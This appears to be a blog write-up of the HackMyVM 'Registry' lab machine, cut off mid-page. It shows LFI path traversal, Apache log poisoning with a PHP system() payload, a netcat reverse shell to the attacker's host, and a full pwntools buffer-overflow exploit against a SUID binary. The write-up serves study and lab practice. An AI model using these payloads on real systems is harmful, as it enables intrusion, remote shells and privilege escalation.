{"id":714,"date":"2024-07-06T01:59:16","date_gmt":"2024-07-05T17:59:16","guid":{"rendered":"http:\/\/162.14.82.114\/?p=714"},"modified":"2024-07-06T01:59:16","modified_gmt":"2024-07-05T17:59:16","slug":"hmv-_-registry","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/714\/07\/06\/2024\/","title":{"rendered":"hmv[-_-]Registry"},"content":{"rendered":"<h1>Registry<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158487.png\" alt=\"image-20240422150827506\" style=\"zoom:50%;\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158488.png\" alt=\"image-20240422151517386\" 
\/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.153 -- -A\n\nOpen 192.168.0.153:22\nOpen 192.168.0.153:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 4d:0e:bf:5f:7c:42:4a:85:95:14:07:6c:07:f8:65:0c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBApCuuNgbJntGQooQzipYmfZbXHW6jqv\/Ra61OaXxCEYBvFXm20nA1rkGHF6OO5ccrcQjNpW1Ip5RpyJBULRMTc=\n|   256 61:cb:06:4a:a5:bf:a2:af:64:0c:9e:d4:20:b0:50:6f (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAU\/i0OezXfBiMIqCmG2G9bmTDjD1t+c0TQuXCTOdJQ0\n80\/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))\n|_http-title: Coming Soon 10\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.153\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.153\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 
10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.php            (Status: 200) [Size: 5938]\n\/.php                 (Status: 403) [Size: 278]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.153\/images\/]\n\/default.php          (Status: 200) [Size: 5938]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.153\/css\/]\n\/js                   (Status: 301) [Size: 311] [--&gt; http:\/\/192.168.0.153\/js\/]\n\/javascript           (Status: 301) [Size: 319] [--&gt; http:\/\/192.168.0.153\/javascript\/]\n\/vendor               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.153\/vendor\/]\n\/fonts                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.153\/fonts\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158489.png\" alt=\"image-20240422151745683\" style=\"zoom:50%;\" \/><\/p>\n<p>Clicking around the site, I found:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=default.php<\/code><\/pre>\n<h3>LFI<\/h3>\n<p>Suspecting an LFI vulnerability, I gave it a try:<\/p>\n<pre><code>http:\/\/192.168.0.153\/index.php?page=..\/..\/..\/..\/..\/..\/etc\/passwd\nhttp:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/etc\/passwd<\/code><\/pre>\n<pre><code class=\"language-bash\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/bash\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd 
Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nusbmux:x:107:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\ngato:x:1000:1000:gato:\/home\/gato:\/bin\/bash\nuuidd:x:108:112::\/run\/uuidd:\/usr\/sbin\/nologin\nuser:x:1001:1001::\/home\/user:\/bin\/bash\ncxdxnt:x:1002:1002::\/home\/cxdxnt:\/bin\/bash<\/code><\/pre>\n<p>So it really does exist. I tried reading through a PHP wrapper (pseudo-protocol), but that failed:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<p>Kept trying other files:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/etc\/apache2\/apache2.conf<\/code><\/pre>\n<p>Tried reading the logs:<\/p>\n<pre><code>\/var\/log\/apache2\/access.log<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158491.png\" alt=\"image-20240422154426345\" 
style=\"zoom:50%;\" \/><\/p>\n<p>Ah.....<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/LFIscanner]\n\u2514\u2500$ curl http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/access.log<\/code><\/pre>\n<p>Nothing there either...<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/error.log<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158492.png\" alt=\"image-20240422155935885\" style=\"zoom:50%;\" \/><\/p>\n<p>Take a look at the error messages in the log:<\/p>\n<pre><code class=\"language-bash\">[Mon Apr 22 07:54:23.040815 2024] [php:error] [pid 733] [client 192.168.0.143:59904] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 161235177 bytes) in \/var\/www\/html\/index.php on line 4\n[Mon Apr 22 07:59:00.445228 2024] [php:warn] [pid 716] [client 192.168.0.152:3142] PHP Warning: 
include(\/var\/www\/html\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache\/access.log): Failed to open stream: No such file or directory in \/var\/www\/html\/index.php on line 4\n[Mon Apr 22 07:59:00.445251 2024] [php:warn] [pid 716] [client 192.168.0.152:3142] PHP Warning: include(): Failed opening &#039;\/var\/www\/html\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache\/access.log&#039; for inclusion (include_path=&#039;.:\/usr\/share\/php&#039;) in \/var\/www\/html\/index.php on line 4<\/code><\/pre>\n<p>Hmm, let's try re-importing the target VM; I had just run an LFI scanning script, which probably bloated the log too much!<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/access.log<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158493.png\" alt=\"image-20240422161643136\" style=\"zoom:50%;\" \/><\/p>\n<p>Now it can be read!<\/p>\n<h3>Log Injection<\/h3>\n<p>Try log injection:<\/p>\n<pre><code class=\"language-bash\">curl &quot;http:\/\/192.168.0.153\/&quot; -A &quot;&lt;?php system(\\$_GET[&#039;hack&#039;]); ?&gt;&quot;  <\/code><\/pre>\n<blockquote>\n<ul>\n<li><code>-A (or --user-agent)<\/code>: sets the 
<strong>User-Agent<\/strong> header.<\/li>\n<li><code>-b (or --cookie)<\/code>: sets the <strong>Cookie<\/strong> header.<\/li>\n<li><code>-e (or --referer)<\/code>: sets the <strong>Referer<\/strong> header.<\/li>\n<\/ul>\n<\/blockquote>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158494.png\" alt=\"image-20240422162319069\" style=\"zoom:50%;\" \/><\/p>\n<p>Success!<\/p>\n<p>Get a reverse shell back:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/access.log&amp;hack=nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158495.png\" alt=\"image-20240422162447403\" 
style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@registry:\/$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/bash\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nusbmux:x:107:46:usbmux 
daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\ngato:x:1000:1000:gato:\/home\/gato:\/bin\/bash\nuuidd:x:108:112::\/run\/uuidd:\/usr\/sbin\/nologin\nuser:x:1001:1001::\/home\/user:\/bin\/bash\ncxdxnt:x:1002:1002::\/home\/cxdxnt:\/bin\/bash\n(remote) www-data@registry:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@registry:\/$ cd \/home\n(remote) www-data@registry:\/home$ ls -la\ntotal 20\ndrwxr-xr-x  5 root   root   4096 Jul 24  2023 .\ndrwxr-xr-x 19 root   root   4096 Jul 24  2023 ..\ndrwxr-x---  3 cxdxnt cxdxnt 4096 Jul 24  2023 cxdxnt\ndrwxr-x---  8 gato   gato   4096 Jul 24  2023 gato\ndrwxr-x---  5 user   user   4096 Jul 24  2023 user\n(remote) www-data@registry:\/home$ cd user\/\nbash: cd: user\/: Permission denied\n(remote) www-data@registry:\/home$ cd cxdxnt\/\nbash: cd: cxdxnt\/: Permission denied\n(remote) www-data@registry:\/home$ cd gato\/\nbash: cd: gato\/: Permission denied\n(remote) www-data@registry:\/home$ find \/ -perm -u=s -type 2&gt;\/dev\/null\n(remote) www-data@registry:\/home$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/bin\/gpasswd\n\/usr\/bin\/fusermount3\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/libexec\/polkit-agent-helper-1\n\/opt\/others\/program\n(remote) www-data@registry:\/home$ file \/opt\/others\/program\n\/opt\/others\/program: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7d65aff0f94edaa475537d22ff820c314b4a33cb, for GNU\/Linux 3.2.0, not stripped\n(remote) www-data@registry:\/home$ \/opt\/others\/program\nUsage: \/opt\/others\/program &lt;name&gt;\n(remote) www-data@registry:\/home$ \/opt\/others\/program user\n(remote) 
www-data@registry:\/home$<\/code><\/pre>\n<h3>\u63d0\u6743cxdxnt<\/h3>\n<h4>\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h4>\n<pre><code class=\"language-bash\">(remote) www-data@registry:\/home$ cd \/opt\/others        \n(remote) www-data@registry:\/opt\/others$ ls -la\ntotal 24\ndrwxr-xr-x 2 cxdxnt cxdxnt  4096 Jul 24  2023 .\ndr-xr-xr-x 5 gato   gato    4096 Jul 24  2023 ..\n-rwsr-xr-x 1 cxdxnt cxdxnt 15976 Jul 24  2023 program\n(remote) www-data@registry:\/opt\/others$   \n(local) pwncat$ download program\nprogram \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 16.0\/16.0 KB \u2022 ? 
\u2022 0:00:00[04:24:34] downloaded 15.98KiB in 0.17 seconds                                                                                            download.py:71\n(local) pwncat$<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ pwn checksec program  \n[*] &#039;\/home\/kali\/temp\/Registry\/program&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX unknown - GNU_STACK missing\n    PIE:      No PIE (0x400000)\n    Stack:    Executable\n    RWX:      Has RWX segments\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ strings program            \n\/lib64\/ld-linux-x86-64.so.2\nuS}&quot;\n1KJ3\n__libc_start_main\nstrcpy\nprintf\nlibc.so.6\nGLIBC_2.2.5\nGLIBC_2.34\n__gmon_start__\nPTE1\nH=8@@\nUsage: %s &lt;name&gt;\n:*3$&quot;\nGCC: (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0\ncrt1.o\n__abi_tag\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.0\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nprogram.c\n__FRAME_END__\n_DYNAMIC\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_start_main@GLIBC_2.34\nstrcpy@GLIBC_2.2.5\nvuln\n_edata\n_fini\nprintf@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n_end\n_dl_relocate_static_pie\n__bss_start\nmain\n__TMC_END__\n_init\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.property\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.sec\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n<h4>\u53cd\u7f16\u8bd1<\/h4>\n<p>\u4f7f\u7528<code>ida64<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  int 
result; \/\/ eax\n  __int64 v5; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v5 = v3;\n  if ( argc &gt; 1 )\n    result = vuln(argv[1], argv, envp);\n  else\n    result = sub_401060(&quot;Usage: %s &lt;name&gt;\\n&quot;, *argv, envp);\n  return result;\n}<\/code><\/pre>\n<pre><code class=\"language-c\">__int64 __usercall vuln@&lt;rax&gt;(__int64 a1@&lt;rbp&gt;, __int64 a2@&lt;rdi&gt;)\n{\n  __int64 v3; \/\/ [rsp-88h] [rbp-88h]\n  __int64 v4; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v4 = a1;\n  return sub_401050(&amp;v3, a2);\n}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158496.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158496.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422180857587\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158497.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158497.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422180922722\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u51fa<code>buffer<\/code>\u5927\u5c0f\u5927\u6982\u4e3a<code>0x80<\/code>\uff0c\u4e5f\u5c31\u662f<code>128<\/code>\uff0c\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ gdb-pwndbg -q program\nReading symbols from program...\n(No debugging symbols found in program)\npwndbg: loaded 156 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.\npwndbg: created $rebase, $base, $ida GDB functions (can be used with print\/break)\n------- tip of the day (disable with set show-tips off) -------\nheap_config shows heap related configuration\npwndbg&gt; cyclic 200\naaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa\npwndbg&gt; run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa\nStarting program: \/home\/kali\/temp\/Registry\/program aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library &quot;\/lib\/x86_64-linux-gnu\/libthread_db.so.1&quot;.\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x00000000004011d9 in vuln ()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158498.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158498.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422172703589\" \/><\/div><\/p>\n<h4>\u67e5\u770b\u504f\u79fb\u91cf<\/h4>\n<pre><code class=\"language-bash\">pwndbg&gt; cyclic -l 0x6161616161616172\nFinding cyclic pattern of 8 bytes: b&#039;raaaaaaa&#039; (hex: 0x7261616161616161)\nFound at offset 136<\/code><\/pre>\n<h4>jmp\u5730\u5740<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ ropper --file program --jmp rax \nJMP Instructions\n================\n0x0000000000401014: call rax; \n0x00000000004010cc: jmp rax; \n0x000000000040110e: jmp rax; \n3 gadgets found<\/code><\/pre>\n<h4>\u7f16\u5199\u811a\u672c<\/h4>\n<p>\u548c<a href=\"https:\/\/xchg2pwn.github.io\/hackmyvm\/registry\/\">\u4f5c\u8005wp<\/a>\u4e2d\u7684\u56fe\u57fa\u672c\u4e0a\u4e00\u6837\uff0c\u6211\u753b\u4e86\u4e2a\u52a0\u6df1\u7406\u89e3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158499.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158499.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422183418525\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8f93\u5165\u5206\u4e3a\u4e09\u90e8\u5206<code>shellcode<\/code>\uff0c<code>junk<\/code>\u4ee5\u53ca<code>callrax<\/code>\u7684<code>RIP<\/code>\u5730\u5740\uff0c\u8fd9\u6837<code>callrax<\/code>\u7684\u65f6\u5019\u5c31\u4f1a\u8c03\u7528\u6211\u4eec\u7684shell\u4e86\uff01<\/p>\n<p>\u9776\u673a\u7cfb\u7edf\u81ea\u5e26\u4e86<code>peda<\/code>\u548c<code>pwntools<\/code>\uff0c\u8fd9\u6b21\u4e0d\u7528\u8fdb\u884csocat\u4ee3\u7406\u518d\u6253\u4e86\uff01<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nfrom pwn import *\n\noffset = 136\n# This module contains functions for generating shellcode.\nshellcode = b&quot;&quot;\nshellcode += asm(shellcraft.amd64.setresuid(1002, 1002), arch=&quot;amd64&quot;)\nshellcode += asm(shellcraft.amd64.sh(), arch = &quot;amd64&quot;)\n\njunk = b&quot;A&quot; * (offset - len(shellcode))\ncallrax = p32(0x401014)\n\npayload = shellcode + junk + callrax    \nshell = process([&quot;\/opt\/others\/program&quot;, payload])\nshell.interactive()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158500.png'><img class=\"lazyload lazyload-style-2\" 